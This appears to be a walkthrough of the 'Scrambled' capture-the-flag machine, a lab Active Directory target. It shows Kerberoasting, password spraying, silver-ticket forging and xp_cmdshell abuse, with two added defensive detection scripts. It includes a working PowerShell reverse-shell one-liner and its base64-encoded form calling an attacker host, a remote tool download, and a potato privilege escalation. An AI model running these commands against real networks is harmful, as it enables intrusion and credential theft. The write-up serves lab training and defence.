Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 23:45 IST
Nmap scan report for 10.10.11.168
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-28 18:15:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
|_ssl-date: 2024-02-28T18:18:59+00:00; 0s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
| ms-sql-info:
| 10.10.11.168:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-02-28T18:15:27
|_Not valid after: 2054-02-28T18:15:27
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-28T18:18:20
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.37 seconds
I'll edit /etc/hosts:
10.10.11.168 DC1.scrm.local scrm.local dc1.scrm.local
Because NTLM is disabled, we won't be able to use many tools like smbclient, as they rely on NTLM authentication.
smbclient -L ////10.10.11.168//
Password for [WORKGROUP\user]:
session setup failed: NT_STATUS_NOT_SUPPORTED
The error says "not supported"; it does not say authentication failure.
Supportrequest.html
We see two usernames.
password.html
I'll use kerbrute to check whether the two usernames I found are valid.
➜ Scrambled /opt/kerbrute userenum --dc dc1.scrm.local -d scrm.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/29/24 - Ronnie Flathers @ropnop
2024/02/29 10:47:58 > Using KDC(s):
2024/02/29 10:47:58 > dc1.scrm.local:88
2024/02/29 10:47:58 > [+] VALID USERNAME: ksimpson@scrm.local
2024/02/29 10:47:58 > Done! Tested 2 usernames (1 valid) in 0.312 seconds
ksimpson is a valid username.
As password.html suggested: "Our self service password reset system will be up and running soon but in the meantime please call the IT support line and we will reset your password. If no one is available please leave a message stating your username and we will reset your password to be the same as the username."
I'll try ksimpson as the password.
➜ Scrambled /opt/kerbrute passwordspray users --user-as-pass --dc dc1.scrm.local -d scrm.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/29/24 - Ronnie Flathers @ropnop
2024/02/29 10:50:45 > Using KDC(s):
2024/02/29 10:50:45 > dc1.scrm.local:88
2024/02/29 10:50:46 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
2024/02/29 10:50:46 > Done! Tested 2 logins (1 successes) in 0.836 seconds
ksimpson:ksimpson is a valid login.
I'll request a TGT as the ksimpson user using impacket-getTGT.
How the tool works:
The user provides their username and password to the tool.
The tool uses these credentials to request a TGT from the Kerberos Key Distribution Center (KDC).
The KDC checks the user's credentials and, if they are valid, issues a TGT.
The tool receives the TGT and can use it to authenticate to other services within the network.
➜ ccache impacket-getTGT scrm.local/ksimpson:ksimpson
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in ksimpson.ccache
ksimpson.ccache is created in the current working directory.
We need to export it:
export KRB5CCNAME=ksimpson.ccache
Now I'll perform Kerberoasting using GetUserSPNs:
➜ ccache impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
And now, to get the hash, I'll use -request:
➜ ccache impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -request
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$553e6a7235a3bf50145de19ebcd28d8d$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
Crack the hash using hashcat.
sqlsvc:Pegasus60
There is an MSSQL service running on port 1433. I'll use these creds to log in, but first I need to get a ticket as the sqlsvc user and export it in KRB5CCNAME.
➜ ccache impacket-getTGT scrm.local/sqlsvc:Pegasus60
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in sqlsvc.ccache
➜ ccache export KRB5CCNAME=sqlsvc.ccache
It did not work:
➜ ccache impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc'.
I'll create a silver ticket in order for this to work, and for that we need the NTLM hash of Pegasus60:
https://codebeautify.org/ntlm-hash-generator
B999A16500B87D17EC7F2E2A68778F05
Now we need a user ID and the domain SID:
impacket-getPac -targetUser administrator scrm.local/ksimpson
domainsid : S-1-5-21-2743207045-1827831105-2542523200
usersid:500
Now I'll forge a TGS (service ticket):
➜ ccache impacket-ticketer -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain dc1.scrm.local
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for dc1.scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME=Administrator.ccache
➜ ccache impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
SQL (SCRM\administrator dbo@master)> enable_xp_cmdshell
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
SQL (SCRM\administrator dbo@master)>
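Two defender-side checks for what the Kerberoasting and silver ticket steps above leave behind, as an added example that is not part of the writeup: the `$krb5tgs$23$` prefix of the cracked hash means etype 23 (RC4-HMAC), which shows up as TicketEncryptionType 0x17 in DC event 4769, and a forged service ticket produces a Kerberos logon on the host without any TGS ever being issued by the KDC. The event records are constructed with a few fields from events 4769 and 4624; the 10.10.14.38 source and the sqlsvc/Administrator names are reused from the writeup.

```python
"""Triage of RC4 Kerberoasting and silver ticket use from constructed DC 4769
and host 4624 records. Added example, not from the writeup."""

RC4_HMAC = 0x17   # etype 23: the "$krb5tgs$23$" prefix of the roasted hash


def parse_krb5tgs_header(h: str) -> dict:
    """Read etype, account, realm and SPN from a hashcat $krb5tgs$ string."""
    parts = h.split("$")   # ['', 'krb5tgs', etype, '*user', realm, 'spn*', ...]
    return {"etype": int(parts[2]), "account": parts[3].lstrip("*"),
            "realm": parts[4], "spn": parts[5].rstrip("*")}


def kerberoast_candidates(tgs_events, service_accounts):
    """4769s requesting RC4 tickets for human-managed service accounts. The fix
    is AES-only on the account (msDS-SupportedEncryptionTypes) or a gMSA."""
    return [e for e in tgs_events
            if e["etype"] == RC4_HMAC and e["service"] in service_accounts]


def silver_ticket_candidates(tgs_events, logon_events):
    """Kerberos network logons on the service host with no TGS issued by the DC
    for that user from that source: a forged ticket never touches the KDC.
    In production correlate within the ticket lifetime, not over a plain set."""
    issued = {(e["user"].split("@")[0].lower(), e["src"]) for e in tgs_events}
    return [l for l in logon_events
            if l["auth"] == "Kerberos" and l["logon_type"] == 3
            and (l["user"].lower(), l["src"]) not in issued]


# Constructed samples reusing the writeup's hosts; not real log exports.
DC_4769 = [
    {"user": "ksimpson@SCRM.LOCAL", "service": "sqlsvc", "etype": 0x17, "src": "10.10.14.38"},
    {"user": "ksimpson@SCRM.LOCAL", "service": "DC1$", "etype": 0x12, "src": "10.10.14.38"},
]
HOST_4624 = [
    {"host": "DC1", "user": "ksimpson", "auth": "Kerberos", "logon_type": 3, "src": "10.10.14.38"},
    {"host": "DC1", "user": "Administrator", "auth": "Kerberos", "logon_type": 3, "src": "10.10.14.38"},
]
# Header taken from the writeup's hash; checksum and ciphertext replaced by zeros.
SAMPLE_HASH = "$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$" + "0" * 32 + "$" + "0" * 64

if __name__ == "__main__":
    print(parse_krb5tgs_header(SAMPLE_HASH))
    print(kerberoast_candidates(DC_4769, {"sqlsvc"}))
    print(silver_ticket_candidates(DC_4769, HOST_4624))
```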
I'll get a reverse shell. I'll use nishang:
cp /opt/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 rev.ps1
➜ ccache cat rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.38',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Transferring this is a pain; Windows expects the little-endian UTF-16 format, so I'll convert it to that:
➜ ccache cat rev.ps1|iconv -t UTF-16LE | base64 -w 0
Start an nc listener on port 9001 and use xp_cmdshell to get a shell: xp_cmdshell powershell -enc base64stuff
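The UTF-16LE plus base64 wrapping built above with iconv is exactly what a defender has to undo when process-creation telemetry (4688, Sysmon) shows a `powershell -enc` command line. This added example (not part of the writeup) does that decode and flags the socket and eval calls a TCP reverse shell needs; the sample script and command line are constructed inside the block.

```python
"""Decode and triage a 'powershell -enc' command line from process telemetry.
Added example, not from the writeup."""
import base64
import re

# Indicators typical of in-memory TCP shells; tune for your environment.
INDICATORS = ("TCPClient", "GetStream", "Invoke-Expression", "iex", "DownloadString")
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Mirror of the iconv/base64 step: -EncodedCommand takes base64 over
    UTF-16LE, not UTF-8, which is why a plain base64 of the file fails."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext script from a command line, or None without -enc."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    if len(raw) % 2:        # UTF-16 needs an even byte count; a truncated
        raw = raw[:-1]      # log field is the usual cause
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline: str) -> dict:
    """Decode the command line and list which indicators the script contains."""
    script = decode_encoded_command(cmdline)
    hits = [] if script is None else [i for i in INDICATORS if i.lower() in script.lower()]
    return {"encoded": script is not None, "script": script, "indicators": hits}


# Constructed sample: a socket-opening fragment (TEST-NET address) built here
# rather than pasted from the writeup so the example runs offline.
SAMPLE_SCRIPT = "$c = New-Object System.Net.Sockets.TCPClient('192.0.2.10',9001);$s = $c.GetStream()"
SAMPLE_CMDLINE = "powershell -enc " + encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```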
Shell
Using whoami /priv
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We have SeImpersonatePrivilege, so we can use a potato attack to become admin.
I'll use [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG).
Download it and upload it to the target using curl:
PS C:\programdata> curl 10.10.14.38/JuicyPotatoNG.exe -o jp.exe
The nishang shell that we converted to base64 to get a reverse shell as the sqlsvc user, I'll use again to get a shell as admin.
For that I'll put the base64 payload in a .bat file and then use JuicyPotato to execute it as the admin user and get a reverse shell.
echo 'powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMwA4ACcALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgAKAAoA' > hello.bat
./jp.exe -t * -p C:\ProgramData\hello.bat
Root
user.txt is in:
PS C:\users\miscsvc\Desktop> dir
Directory: C:\users\miscsvc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 28/02/2024 18:15 34 user.txt